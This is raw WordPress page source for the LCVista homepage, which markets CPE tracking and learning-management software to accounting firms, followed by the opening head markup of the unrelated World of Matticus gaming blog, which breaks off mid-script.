g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);</script> <style type="text/css">img.wp-smiley,img.emoji{display:inline!important;border:none!important;box-shadow:none!important;height:1em!important;width:1em!important;margin:0 .07em!important;vertical-align:-.1em!important;background:none!important;padding:0!important}</style> <link rel='stylesheet' id='wp-block-library-css' href='https://lcvista.com/wp-includes/css/dist/block-library/style.min.css?ver=5.0.4' type='text/css' media='all'/> <link rel='stylesheet' id='contact-form-7-css' href='https://lcvista.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1' type='text/css' media='all'/> <link rel='stylesheet' id='font-awesome-css' href='//netdna.bootstrapcdn.com/font-awesome/4.1.0/css/font-awesome.min.css?ver=4.1.0' type='text/css' media='all'/> <link rel='stylesheet' id='section-style-css' href='https://lcvista.com/wp-content/plugins/templatesnext-onepager/css/section-style.css?ver=1.02' type='text/css' media='all'/> <link rel='stylesheet' id='owl-carousel-css' href='https://lcvista.com/wp-content/plugins/templatesnext-onepager/css/tx/owl.carousel.css?ver=1.3.2' type='text/css' media='all'/> <link rel='stylesheet' id='owl-carousel-transitions-css' href='https://lcvista.com/wp-content/plugins/templatesnext-onepager/css/tx/owl.transitions.css?ver=1.3.2' type='text/css' media='all'/> <link rel='stylesheet' id='animate-css' href='https://lcvista.com/wp-content/plugins/templatesnext-onepager/css/tx/animate.css?ver=3.5.1' type='text/css' media='all'/> <link rel='stylesheet' id='colorbox-css' href='https://lcvista.com/wp-content/plugins/templatesnext-onepager/css/tx/colorbox.css?ver=1.5.14' type='text/css' media='all'/> <link rel='stylesheet' id='tx-style-css' href='https://lcvista.com/wp-content/plugins/templatesnext-onepager/css/tx/tx-style.css?ver=1.01' type='text/css' media='all'/> <link rel='stylesheet' id='woocommerce-layout-css' href='https://lcvista.com/wp-content/plugins/woocommerce/assets/css/woocommerce-layout.css?ver=3.5.4' type='text/css' media='all'/> <link rel='stylesheet' id='woocommerce-smallscreen-css' href='https://lcvista.com/wp-content/plugins/woocommerce/assets/css/woocommerce-smallscreen.css?ver=3.5.4' type='text/css' media='only screen and (max-width: 768px)'/> <link rel='stylesheet' id='woocommerce-general-css' href='https://lcvista.com/wp-content/plugins/woocommerce/assets/css/woocommerce.css?ver=3.5.4' type='text/css' media='all'/> <style id='woocommerce-inline-inline-css' type='text/css'>.woocommerce form .form-row .required{visibility:visible}</style> <link rel='stylesheet' id='style-css' href='https://lcvista.com/wp-content/themes/realsoccer/style.css?ver=5.0.4' type='text/css' media='all'/> <link crossorigin="anonymous" rel='stylesheet' id='Open-Sans-Condensed-google-font-css' href='https://fonts.googleapis.com/css?family=Open+Sans+Condensed%3A300%2C300italic%2C700&#038;subset=greek%2Ccyrillic-ext%2Ccyrillic%2Clatin%2Clatin-ext%2Cvietnamese%2Cgreek-ext&#038;ver=5.0.4' type='text/css' media='all'/> <link crossorigin="anonymous" rel='stylesheet' id='Open-Sans-google-font-css' href='https://fonts.googleapis.com/css?family=Open+Sans%3A300%2C300italic%2Cregular%2Citalic%2C600%2C600italic%2C700%2C700italic%2C800%2C800italic&#038;subset=greek%2Ccyrillic-ext%2Ccyrillic%2Clatin%2Clatin-ext%2Cvietnamese%2Cgreek-ext&#038;ver=5.0.4' type='text/css' media='all'/> <link crossorigin="anonymous" rel='stylesheet' id='ABeeZee-google-font-css' href='https://fonts.googleapis.com/css?family=ABeeZee%3Aregular%2Citalic&#038;subset=latin&#038;ver=5.0.4' type='text/css' media='all'/> <link rel='stylesheet' id='superfish-css' href='https://lcvista.com/wp-content/themes/realsoccer/plugins/superfish/css/superfish.css?ver=5.0.4' type='text/css' media='all'/> <link rel='stylesheet' id='dlmenu-css' href='https://lcvista.com/wp-content/themes/realsoccer/plugins/dl-menu/component.css?ver=5.0.4' type='text/css' media='all'/> <!--[if lt IE 8]> <link rel='stylesheet' id='font-awesome-ie7-css' href='https://lcvista.com/wp-content/themes/realsoccer/plugins/font-awesome/css/font-awesome-ie7.min.css?ver=5.0.4' type='text/css' media='all' /> <![endif]--> <link rel='stylesheet' id='jquery-fancybox-css' href='https://lcvista.com/wp-content/themes/realsoccer/plugins/fancybox/jquery.fancybox.css?ver=5.0.4' type='text/css' media='all'/> <link rel='stylesheet' id='realsoccer_flexslider-css' href='https://lcvista.com/wp-content/themes/realsoccer/plugins/flexslider/flexslider.css?ver=5.0.4' type='text/css' media='all'/> <link rel='stylesheet' id='style-responsive-css' href='https://lcvista.com/wp-content/themes/realsoccer/stylesheet/style-responsive.css?ver=5.0.4' type='text/css' media='all'/> <link rel='stylesheet' id='style-custom-css' href='https://lcvista.com/wp-content/themes/realsoccer/stylesheet/style-custom.css?ver=5.0.4' type='text/css' media='all'/> <link rel='stylesheet' id='gdlr-woo-style-css' href='https://lcvista.com/wp-content/themes/realsoccer/stylesheet/gdlr-woocommerce.css?ver=5.0.4' type='text/css' media='all'/> <link rel='stylesheet' id='ms-main-css' href='https://lcvista.com/wp-content/plugins/masterslider/public/assets/css/masterslider.main.css?ver=2.25.4' type='text/css' media='all'/> <link rel='stylesheet' id='ms-custom-css' href='https://lcvista.com/wp-content/uploads/masterslider/custom.css?ver=34.5' type='text/css' media='all'/> <script type='text/javascript' src='https://lcvista.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://lcvista.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript'>//<![CDATA[ var wpgmza_google_api_status={"message":"Enqueued","code":"ENQUEUED"}; //]]></script> <script type='text/javascript' src='https://lcvista.com/wp-content/plugins/wp-google-maps/wpgmza_data.js?ver=5.0.4'></script> <link rel='https://api.w.org/' href='https://lcvista.com/wp-json/'/> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://lcvista.com/xmlrpc.php?rsd"/> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="https://lcvista.com/wp-includes/wlwmanifest.xml"/> <meta name="generator" content="WordPress 5.0.4"/> <meta name="generator" content="WooCommerce 3.5.4"/> <link rel="canonical" href="https://lcvista.com/"/> <link rel='shortlink' href='https://lcvista.com/'/> <link rel="alternate" type="application/json+oembed" href="https://lcvista.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Flcvista.com%2F"/> <link rel="alternate" type="text/xml+oembed" href="https://lcvista.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Flcvista.com%2F&#038;format=xml"/> <script>var ms_grabbing_curosr='https://lcvista.com/wp-content/plugins/masterslider/public/assets/css/common/grabbing.cur',ms_grab_curosr='https://lcvista.com/wp-content/plugins/masterslider/public/assets/css/common/grab.cur';</script> <meta name="generator" content="MasterSlider 2.25.4 - Responsive Touch Image Slider"/> <link rel="shortcut icon" href="https://lcvista.com/wp-content/uploads/2018/02/favicon_square.png" type="image/x-icon"/><!-- load the script for older ie version --> <!--[if lt IE 9]> <script src="https://lcvista.com/wp-content/themes/realsoccer/javascript/html5.js" type="text/javascript"></script> <script src="https://lcvista.com/wp-content/themes/realsoccer/plugins/easy-pie-chart/excanvas.js" type="text/javascript"></script> <![endif]--> <noscript><style>.woocommerce-product-gallery{opacity:1!important}</style></noscript> <link rel="icon" href="https://lcvista.com/wp-content/uploads/2018/02/favicon_square-60x60.png" sizes="32x32"/> <link rel="icon" href="https://lcvista.com/wp-content/uploads/2018/02/favicon_square.png" sizes="192x192"/> <link rel="apple-touch-icon-precomposed" href="https://lcvista.com/wp-content/uploads/2018/02/favicon_square.png"/> <meta name="msapplication-TileImage" content="https://lcvista.com/wp-content/uploads/2018/02/favicon_square.png"/> </head> <body class="home page-template-default page page-id-221 _masterslider _msp_version_2.25.4 woocommerce-no-js"> <div class="body-wrapper realsoccer-header-style-1" data-home="https://lcvista.com"> <header class="gdlr-header-wrapper gdlr-no-height"> <!-- top navigation --> <!-- logo --> <div class="gdlr-header-inner"> <div class="gdlr-header-container container"> <!-- logo --> <div class="gdlr-logo"> <a href="https://lcvista.com"> <img src="https://lcvista.com/wp-content/uploads/2018/02/lcvista_logo_35-1.png" alt="" width="185" height="35"/> </a> <div class="gdlr-responsive-navigation dl-menuwrapper" id="gdlr-responsive-navigation"><button class="dl-trigger">Open Menu</button><ul id="menu-i-amaze-menu" class="dl-menu gdlr-main-mobile-menu"><li id="menu-item-542" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-221 current_page_item menu-item-542"><a href="https://lcvista.com/">Homepage</a></li> <li id="menu-item-540" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-540"><a href="https://lcvista.com/about/">About Us</a> <ul class="dl-submenu"> <li id="menu-item-715" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-715"><a href="https://lcvista.com/about/">Our Approach</a></li> <li id="menu-item-535" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-535"><a href="https://lcvista.com/staff/">Staff</a></li> </ul> </li> <li id="menu-item-537" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-537"><a href="https://lcvista.com/lms/">Learning Management</a></li> <li id="menu-item-539" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-539"><a href="https://lcvista.com/compliance/">Compliance</a></li> <li id="menu-item-538" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-538"><a href="https://lcvista.com/testimonials/">Community</a></li> <li id="menu-item-534" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-534"><a href="https://lcvista.com/resources/">Resources</a></li> <li id="menu-item-541" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-541"><a href="https://lcvista.com/contact/">Contact</a></li> </ul></div> </div> <!-- navigation --> <div class="gdlr-navigation-wrapper"><div class="gdlr-navigation-container container"><nav class="gdlr-navigation" id="gdlr-main-navigation" role="navigation"><ul id="menu-i-amaze-menu-1" class="sf-menu gdlr-main-menu"><li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-221 current_page_item menu-item-542menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-221 current_page_item menu-item-542 gdlr-normal-menu"><a href="https://lcvista.com/">Homepage</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-540menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-540 gdlr-normal-menu"><a href="https://lcvista.com/about/">About Us</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-715"><a href="https://lcvista.com/about/">Our Approach</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-535"><a href="https://lcvista.com/staff/">Staff</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-537menu-item menu-item-type-post_type menu-item-object-page menu-item-537 gdlr-normal-menu"><a href="https://lcvista.com/lms/">Learning Management</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-539menu-item menu-item-type-post_type menu-item-object-page menu-item-539 gdlr-normal-menu"><a href="https://lcvista.com/compliance/">Compliance</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-538menu-item menu-item-type-post_type menu-item-object-page menu-item-538 gdlr-normal-menu"><a href="https://lcvista.com/testimonials/">Community</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-534menu-item menu-item-type-post_type menu-item-object-page menu-item-534 gdlr-normal-menu"><a href="https://lcvista.com/resources/">Resources</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-541menu-item menu-item-type-post_type menu-item-object-page menu-item-541 gdlr-normal-menu"><a href="https://lcvista.com/contact/">Contact</a></li> </ul></nav><i class="icon-search fa fa-search gdlr-menu-search-button" id="gdlr-menu-search-button"></i> <div class="gdlr-menu-search" id="gdlr-menu-search"> <form method="get" id="searchform" action="https://lcvista.com/"> <div class="search-text"> <input type="text" value="Type Keywords" name="s" autocomplete="off" data-default="Type Keywords"/> </div> <input type="submit" value=""/> <div class="clear"></div> </form> </div> <div class="clear"></div></div></div><div id="gdlr-header-substitute"></div> <div class="clear"></div> </div> </div> <div class="clear"></div> </header> <div class="content-wrapper"> <div class="gdlr-content"> <!-- Above Sidebar Section--> <!-- Sidebar With Content Section--> <div class="with-sidebar-wrapper"><section id="content-section-1"><div class="section-container container"><div class="gdlr-master-slider-item gdlr-slider-item gdlr-item" style="margin-bottom: 0px;"> <!-- MasterSlider --> <div id="P_MS5ad51c290515a" class="master-slider-parent ms-parent-id-1"> <!-- MasterSlider Main --> <div id="MS5ad51c290515a" class="master-slider ms-skin-default"> <div class="ms-slide" data-delay="3.3" data-fill-mode="fill"> <img src="http://52.24.21.135/wp-content/plugins/masterslider/public/assets/css/blank.gif" alt="" title="" data-src="http://52.24.21.135/wp-content/uploads/2018/02/mountainn-left-600-1180x465.jpg"/> <div class="ms-layer msp-cn-1-10" style="" data-effect="t(true,n,n,1500,n,n,n,n,n,n,n,n,n,n,n)" data-duration="687" data-delay="1237" data-ease="easeInOutQuad" data-offset-x="522" data-offset-y="233" data-origin="tl" data-position="normal"> LCVista</div> <div class="ms-layer msp-cn-1-1" style="" data-effect="t(true,n,n,-500,n,n,n,n,n,n,n,n,n,n,n)" data-duration="637" data-delay="612" data-ease="easeOutQuint" data-offset-x="281" data-offset-y="166" data-origin="tl" data-position="normal"> Welcome To</div> </div> <div class="ms-slide" data-delay="3" data-fill-mode="fill"> <img src="http://52.24.21.135/wp-content/plugins/masterslider/public/assets/css/blank.gif" alt="" title="" data-src="http://52.24.21.135/wp-content/uploads/2018/02/mountainn-right-600-1180x465.jpg"/> <div class="ms-layer msp-cn-1-12" style="width:1100px;" data-effect="t(true,n,n,-500,n,n,n,n,n,n,n,n,n,n,n)" data-duration="1600" data-delay="1425" data-ease="easeOutQuint" data-offset-x="147" data-offset-y="274" data-origin="tl" data-position="normal"> <p style="text-align: left;">YOUR CPE TRACKING &amp; COMPLIANCE MANAGEMENT</p></div> <div class="ms-layer msp-cn-1-6" style="width:1100px;" data-effect="t(true,n,n,500,n,n,n,n,n,n,n,n,n,n,n)" data-duration="925" data-delay="737" data-ease="easeOutQuint" data-offset-x="-74" data-offset-y="159" data-origin="tl" data-position="normal"> Simplifying</div> </div> <div class="ms-slide" data-delay="3" data-fill-mode="fill"> <img src="http://52.24.21.135/wp-content/plugins/masterslider/public/assets/css/blank.gif" alt="" title="" data-src="http://52.24.21.135/wp-content/uploads/2018/02/mountainn-center-600-1180x465.jpg"/> <div class="ms-layer msp-cn-1-15" style="width:1000px;" data-duration="1400" data-delay="1637" data-ease="easeOutQuint" data-offset-x="201" data-offset-y="194" data-origin="tl" data-position="normal"> BY YOU</div> <div class="ms-layer msp-cn-1-7" style="" data-effect="t(true,n,-150,n,n,n,n,n,n,n,n,n,n,n,n)" data-duration="1162" data-delay="487" data-ease="easeOutQuint" data-offset-x="249" data-offset-y="125" data-origin="tl" data-position="normal"> Built for you</div> </div> </div> <!-- END MasterSlider Main --> </div> <!-- END MasterSlider --> <script>(window.MSReady=window.MSReady||[]).push(function($){"use strict";var masterslider_515a=new MasterSlider();masterslider_515a.setup("MS5ad51c290515a",{width:1180,height:465,minHeight:0,space:0,start:1,grabCursor:false,swipe:false,mouse:false,keyboard:false,layout:"fullwidth",wheel:false,autoplay:true,instantStartLayers:true,loop:true,shuffle:false,preload:0,heightLimit:true,autoHeight:false,smoothHeight:true,endPause:false,overPause:false,fillMode:"fill",centerControls:false,startOnAppear:false,layersMode:"center",autofillTarget:"",hideLayers:true,fullscreenMargin:0,speed:20,dir:"h",parallaxMode:'swipe',view:"fade"});$("head").append("<link rel='stylesheet' id='ms-fonts' href='//fonts.googleapis.com/css?family=Open+Sans Condensed:700,300|Open+Sans:700' type='text/css' media='all' />");window.masterslider_instances=window.masterslider_instances||[];window.masterslider_instances.push(masterslider_515a);});</script> </div><div class="clear"></div><div class="clear"></div><div class="gdlr-item-title-wrapper gdlr-item pos-center "><div class="gdlr-item-title-head"><div class="clear"></div></div></div><div class="gdlr-item gdlr-content-item" style="margin-bottom: 40px;"><p style="text-align: center;"><strong><span style="color: #0ba3ef; font-size: 16pt;">LCVista is an industry-leading solution for your Learning Management needs.</span></strong></p> <p style="font-size: 16px; text-align: center;"><strong>Our team has a combined experience of over twenty years in serving the unique learning and development needs of accounting firms.</strong></p> </div><div class="clear"></div></div></section><section id="content-section-2"><div class="gdlr-color-wrapper gdlr-show-all no-skin" style="background-color: #00457c; padding-top: 70px; padding-bottom: 00px; "><div class="container"><div class="six columns"><div class="gdlr-image-frame-item gdlr-item"><div class="gdlr-frame frame-type-rounded"><div class="gdlr-image-link-shortcode"><img src="https://lcvista.com/wp-content/uploads/2018/04/lms-icon-newest-1-150x150.jpg" alt="" width="150" height="150"/><a class="gdlr-image-link-overlay-wrapper" href="https://lcvista.com/lms/"><span class="gdlr-image-link-overlay">&nbsp;</span><span class="gdlr-image-link-icon"></span><i class="icon-link fa fa-link"></i></a></div></div></div><div class="gdlr-item-title-wrapper gdlr-item pos-center "><div class="gdlr-item-title-head"><h3 class="gdlr-item-title gdlr-skin-title gdlr-skin-border">LEARNING MANAGEMENT SYSTEM</h3><div class="clear"></div></div></div><div class="gdlr-item gdlr-content-item" style="margin-bottom: 60px;"><p style="text-align: center;"><span style="color: white;">LCVista covers the entire learning experience, beginning with an intuitive enrollment process to a comprehensive completion experience.</span></p> </div></div><div class="six columns"><div class="gdlr-image-frame-item gdlr-item"><div class="gdlr-frame frame-type-rounded"><div class="gdlr-image-link-shortcode"><img src="https://lcvista.com/wp-content/uploads/2018/04/compliance-icon-new-150x150.jpg" alt="" width="150" height="150"/><a class="gdlr-image-link-overlay-wrapper" href="https://lcvista.com/compliance/"><span class="gdlr-image-link-overlay">&nbsp;</span><span class="gdlr-image-link-icon"></span><i class="icon-link fa fa-link"></i></a></div></div></div><div class="gdlr-item-title-wrapper gdlr-item pos-center "><div class="gdlr-item-title-head"><h3 class="gdlr-item-title gdlr-skin-title gdlr-skin-border">Compliance</h3><div class="clear"></div></div></div><div class="gdlr-item gdlr-content-item" style="margin-bottom: 60px;"><p style="text-align: center;"><span style="color: white;">The Compliance product can be integrated with a third party LMS system or can be implemented with the fully-integrated LCVista LMS.</span></p> </div></div><div class="clear"></div></div></div><div class="clear"></div></section><section id="content-section-3"><div class="gdlr-color-wrapper gdlr-show-all gdlr-skin-dark-skin" style="background-color: #00457c; padding-top: 10px; padding-bottom: 10px; "><div class="container"><div class="clear"></div></div></div><div class="clear"></div></section></div> <!-- Below Sidebar Section--> </div><!-- gdlr-content --> <div class="clear"></div> </div><!-- content wrapper --> <footer class="footer-wrapper"> <div class="copyright-wrapper"> <div class="copyright-container container"> <div class="copyright-left"> LCVista </div> <div class="copyright-right"> We invest in your professionals' learning experience. </div> <div class="clear"></div> </div> </div> </footer> </div> <!-- body-wrapper --> <script type="text/javascript"></script> <script type="text/javascript">var c=document.body.className;c=c.replace(/woocommerce-no-js/,'woocommerce-js');document.body.className=c;</script> <script type='text/javascript' src='https://lcvista.com/wp-includes/js/underscore.min.js?ver=1.8.3'></script> <script type='text/javascript' src='https://lcvista.com/wp-includes/js/backbone.min.js?ver=1.2.3'></script> <script type='text/javascript'>//<![CDATA[ var wpApiSettings={"root":"https:\/\/lcvista.com\/wp-json\/","nonce":"5542f3bf3c","versionString":"wp\/v2\/"}; //]]></script> <script type='text/javascript' src='https://lcvista.com/wp-includes/js/api-request.min.js?ver=5.0.4'></script> <script type='text/javascript' src='https://lcvista.com/wp-includes/js/wp-api.min.js?ver=5.0.4'></script> <script type='text/javascript'>//<![CDATA[ var wpcf7={"apiSettings":{"root":"https:\/\/lcvista.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; //]]></script> <script type='text/javascript' src='https://lcvista.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript' src='https://lcvista.com/wp-content/plugins/goodlayers-soccer/javascript/gdlr-soccer.js?ver=1.0.0'></script> <script type='text/javascript' src='https://lcvista.com/wp-includes/js/imagesloaded.min.js?ver=3.2.0'></script> <script type='text/javascript' src='https://lcvista.com/wp-includes/js/masonry.min.js?ver=3.3.2'></script> <script type='text/javascript' src='https://lcvista.com/wp-includes/js/jquery/jquery.masonry.min.js?ver=3.1.2b'></script> <script type='text/javascript' src='https://lcvista.com/wp-content/plugins/templatesnext-onepager/js/parlx.js?ver=1.5.14'></script> <script type='text/javascript' src='https://lcvista.com/wp-content/plugins/templatesnext-onepager//js/waypoints.min.js?ver=2014-01-13'></script> <script type='text/javascript' src='https://lcvista.com/wp-content/plugins/templatesnext-onepager/js/circle-progress.min.js?ver=1.2.0'></script> <script type='text/javascript' src='//cdnjs.cloudflare.com/ajax/libs/jquery.form/3.32/jquery.form.js?ver=1.0.0'></script> <script type='text/javascript' src='//cdnjs.cloudflare.com/ajax/libs/jquery-validate/1.11.1/jquery.validate.min.js?ver=1.0.0'></script> <script type='text/javascript' src='https://lcvista.com/wp-content/plugins/templatesnext-onepager/js/ajax-script.js?ver=2013-07-18'></script> <script type='text/javascript' src='https://lcvista.com/wp-content/plugins/templatesnext-onepager/js/section-script.js?ver=2013-07-18'></script> <script type='text/javascript' src='https://lcvista.com/wp-content/plugins/templatesnext-onepager/js/tx/owl.carousel.min.js?ver=1.3.2'></script> <script type='text/javascript' src='https://lcvista.com/wp-content/plugins/templatesnext-onepager/js/tx/jquery.colorbox-min.js?ver=1.5.14'></script> <script type='text/javascript' src='https://lcvista.com/wp-content/plugins/templatesnext-onepager/js/tx/jquery.inview.min.js?ver=1.0.0'></script> <script type='text/javascript' src='https://lcvista.com/wp-content/plugins/templatesnext-onepager/js/tx/tx-script.js?ver=2013-07-18'></script> <script type='text/javascript' src='https://lcvista.com/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.min.js?ver=2.70'></script> <script type='text/javascript'>//<![CDATA[ var wc_add_to_cart_params={"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","i18n_view_cart":"View cart","cart_url":"https:\/\/lcvista.com","is_cart":"","cart_redirect_after_add":"no"}; //]]></script> <script type='text/javascript' src='https://lcvista.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=3.5.4'></script> <script type='text/javascript' src='https://lcvista.com/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=2.1.4'></script> <script type='text/javascript'>//<![CDATA[ var woocommerce_params={"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%"}; //]]></script> <script type='text/javascript' src='https://lcvista.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.5.4'></script> <script type='text/javascript'>//<![CDATA[ var wc_cart_fragments_params={"ajax_url":"\/wp-admin\/admin-ajax.php","wc_ajax_url":"\/?wc-ajax=%%endpoint%%","cart_hash_key":"wc_cart_hash_7ffa1259d33260cc2d50dfd221bfbc21","fragment_name":"wc_fragments_7ffa1259d33260cc2d50dfd221bfbc21"}; //]]></script> <script type='text/javascript' src='https://lcvista.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.5.4'></script> <script type='text/javascript' src='https://lcvista.com/wp-content/themes/realsoccer/plugins/superfish/js/superfish.js?ver=1.0'></script> <script type='text/javascript' src='https://lcvista.com/wp-includes/js/hoverIntent.min.js?ver=1.8.1'></script> <script type='text/javascript' src='https://lcvista.com/wp-content/themes/realsoccer/plugins/dl-menu/modernizr.custom.js?ver=1.0'></script> <script type='text/javascript' src='https://lcvista.com/wp-content/themes/realsoccer/plugins/dl-menu/jquery.dlmenu.js?ver=1.0'></script> <script type='text/javascript' src='https://lcvista.com/wp-content/themes/realsoccer/plugins/jquery.easing.js?ver=1.0'></script> <script type='text/javascript' src='https://lcvista.com/wp-content/themes/realsoccer/plugins/fancybox/jquery.fancybox.pack.js?ver=1.0'></script> <script type='text/javascript' src='https://lcvista.com/wp-content/themes/realsoccer/plugins/fancybox/helpers/jquery.fancybox-media.js?ver=1.0'></script> <script type='text/javascript' src='https://lcvista.com/wp-content/themes/realsoccer/plugins/fancybox/helpers/jquery.fancybox-thumbs.js?ver=1.0'></script> <script type='text/javascript' src='https://lcvista.com/wp-content/themes/realsoccer/plugins/flexslider/jquery.flexslider.js?ver=1.0'></script> <script type='text/javascript' src='https://lcvista.com/wp-content/themes/realsoccer/javascript/gdlr-script.js?ver=1.0'></script> <script type='text/javascript' src='https://lcvista.com/wp-includes/js/wp-embed.min.js?ver=5.0.4'></script> <script type='text/javascript' src='https://lcvista.com/wp-content/plugins/masterslider/public/assets/js/masterslider.min.js?ver=2.25.4'></script> </body> </html>
0
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US" prefix="og: http://ogp.me/ns#"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"/><title>World of Matticus - Blog for World of Warcraft healers and raiders</title> <!-- This site is optimized with the Yoast SEO plugin v10.0.1 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="Blog for World of Warcraft healers and raiders"/> <link rel="canonical" href="http://www.worldofmatticus.com/" /> <link rel="next" href="http://www.worldofmatticus.com/page/2/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="World of Matticus - Blog for World of Warcraft healers and raiders" /> <meta property="og:description" content="Blog for World of Warcraft healers and raiders" /> <meta property="og:url" content="http://www.worldofmatticus.com/" /> <meta property="og:site_name" content="World of Matticus" /> <meta name="twitter:card" content="summary" /> <meta name="twitter:description" content="Blog for World of Warcraft healers and raiders" /> <meta name="twitter:title" content="World of Matticus - Blog for World of Warcraft healers and raiders" /> <meta name="twitter:site" content="@matticus" /> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"WebSite","@id":"http://www.worldofmatticus.com/#website","url":"http://www.worldofmatticus.com/","name":"World of Matticus","potentialAction":{"@type":"SearchAction","target":"http://www.worldofmatticus.com/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"https://schema.org","@type":"Person","url":"http://www.worldofmatticus.com/","sameAs":["http://www.facebook.com/WorldofMatticus","http://www.youtube.com/worldofmatticus","http://pinterest.com/mattycus/","https://twitter.com/matticus"],"@id":"#person","name":"Matticus"}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//platform.twitter.com' /> <link rel='dns-prefetch' href='//apis.google.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="World of Matticus &raquo; Feed" href="http://feeds.feedburner.com/WorldOfMatticus" /> <link rel="alternate" type="application/rss+xml" title="World of Matticus &raquo; Comments Feed" href="http://feeds.feedburner.com/CommentsForWorldOfMatticus" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/12.0.0-1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/www.worldofmatticus.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.2"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55357,56424,55356,57342,8205,55358,56605,8205,55357,56424,55356,57340],[55357,56424,55356,57342,8203,55358,56605,8203,55357,56424,55356,57340]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var 